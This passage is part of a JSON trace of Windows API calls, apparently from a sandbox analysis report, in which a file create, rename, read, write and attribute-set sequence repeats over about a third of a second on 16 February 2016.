"filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,676", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,686", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,686", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,696", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,696", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:44,706", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,706", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,706", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,716", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,716", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,716", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,716", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,726", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,726", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,726", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,726", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,726", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,726", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,726", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:44,736", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,736", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,736", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,736", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,736", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,736", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,736", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,736", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,746", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,746", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,757", 
"api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,757", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,767", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,767", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,777", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,777", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,797", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,797", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,797", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,807", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,807", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,817", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,817", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,827", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,827", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,827", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtSetInformationFile"}, {"category": "process", 
"timestamp": "2016-02-16 17:41:44,837", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,847", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,857", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:44,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,857", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,867", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,877", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", 
"api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,887", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,887", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,897", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,907", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": 
"NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,927", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,937", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtCreateFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,937", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,947", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,957", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,967", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,967", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:44,977", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,977", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,987", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,997", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:44,997", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,997", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,007", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,017", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,017", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
